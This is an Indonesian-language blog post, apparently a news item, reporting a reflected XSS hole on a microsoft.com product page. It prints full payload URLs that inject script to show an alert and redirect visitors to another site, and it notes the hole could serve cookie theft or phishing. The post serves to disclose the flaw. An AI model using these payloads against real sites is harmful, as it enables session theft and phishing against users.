W0ot ..Microsoft website (microsoft.com) rentan terhadap XSS
Posted by Unknown
on
Tidaj bisa kita bayangkan kalau security microsoft masih tidak bagus, anak-anak IT di dalam situ kerja apa yah? kemaren sempat sub domain di hack oleh hacker Indonesia aliah Hmei7, nah sekrang terdapat XSS pula, menurut Security Researcher @flexxpoint datang dengan menarik menemukan site resmi Microsoft website (micrsoft.com) rentan ke Cross Site Scripting (XSS). Kerentanan ini di url halaman Produk.
http://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"--><svg><script><!>alert('XSS');document.location.replace('http://ehackingnews.com')</script>http://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"--></style></script%<svg><!>3E<script>alert('Simple XSS')</script>
Kode disorot di inject kode serangan XSS. Kode kotak pertama di atas peringatan popup yang mengatakan "XSS", sesudah itu akan mengarahkan Anda ke situs web ehackingnews.com.
Versi sederhana dari kode:
http://www.microsoft.com/en-us/together/possibilities.aspx?hdrFo=mthdr02'"--><script>alert("XSS")</script>
Mengganti kode ini dengan javascript memungkinkan berbahaya penyerang untuk mencuri cookie atau dapat digunakan untuk serangan phishing. Di masa lalu, peneliti menemukan kerentanan XSS di website Ubuntu juga.
About the Author
Write admin description here..
Get Updates
Subscribe to our e-mail newsletter to receive updates.
Share This Post
Related posts
